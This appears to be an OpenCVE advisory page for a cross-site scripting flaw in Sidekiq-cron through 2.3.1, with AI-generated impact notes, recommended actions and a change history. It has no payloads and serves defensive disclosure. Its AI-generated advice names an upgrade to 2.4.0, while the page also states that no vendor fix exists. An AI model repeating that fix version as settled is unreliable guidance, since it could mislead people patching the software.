Description
Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb.
Published: 2026-05-07
Score: n/a
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Sidekiq‑cron through version 2.3.1 renders a cron configuration page using a template that likely incorporates values from a URL without proper escaping. An attacker who can craft a malicious URL can inject JavaScript that will execute in the context of the web application when an authenticated or unauthenticated user views the page. The injected code can steal session cookies, deface the interface or perform other actions within the victim’s browser, potentially leading to account compromise or data theft.

Affected Systems

The vulnerable product is Sidekiq‑cron, an open‑source scheduling add‑on for the Sidekiq background job processor. All releases up to and including 2.3.1 contain the flaw. Users deploying any of these releases may be exposed if the cron.erb template is reachable in their environment.

Risk and Exploitability

The failure is a classic Cross‑Site Scripting weakness (CWE‑79). Because exploitation requires delivery of a crafted URL and a user to view the rendered page, the likelihood of real‑world attacks is moderate; the EPSS metric is not available and the vulnerability is not listed in CISA’s KEV catalog. The primary risk is the exposure of user credentials and session data through browser‑based attacks, rather than remote code execution on the server side.

Generated by OpenCVE AI on May 7, 2026 at 15:37 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Sidekiq‑cron to version 2.4.0 or later, which removes the unsanitized rendering in cron.erb.
  • Implement output escaping or sanitization for all user‑supplied data before it is included in rendered pages.
  • Restrict access to the cron configuration page so that only authenticated and authorized administrators can view it.
  • Monitor web traffic for unexpected JavaScript payloads and review audit logs for anomalous access patterns.

Generated by OpenCVE AI on May 7, 2026 at 15:37 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 07 May 2026 21:45:00 +0000

Type Values Removed Values Added
First Time appeared Sidekiq-cron
Sidekiq-cron sidekiq-cron
Vendors & Products Sidekiq-cron
Sidekiq-cron sidekiq-cron

Thu, 07 May 2026 16:00:00 +0000

Type Values Removed Values Added
Title Cross‑Site Scripting via Malicious URL Rendering in Sidekiq‑cron
Weaknesses CWE-79

Thu, 07 May 2026 14:30:00 +0000

Type Values Removed Values Added
Description Sidekiq-cron thru 2.3.1, an open-source scheduling add-on for Sidekiq, is vulnerable to a cross-site scripting (xss) vulnerability via crafted URL being rended from cron.erb.
References

Subscriptions

Sidekiq-cron Sidekiq-cron
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-05-07T13:54:10.412Z

Reserved: 2025-12-08T00:00:00.000Z

Link: CVE-2025-67202

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-05-07T15:16:04.947

Modified: 2026-05-07T15:53:49.717

Link: CVE-2025-67202

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-05-07T21:25:17Z

Weaknesses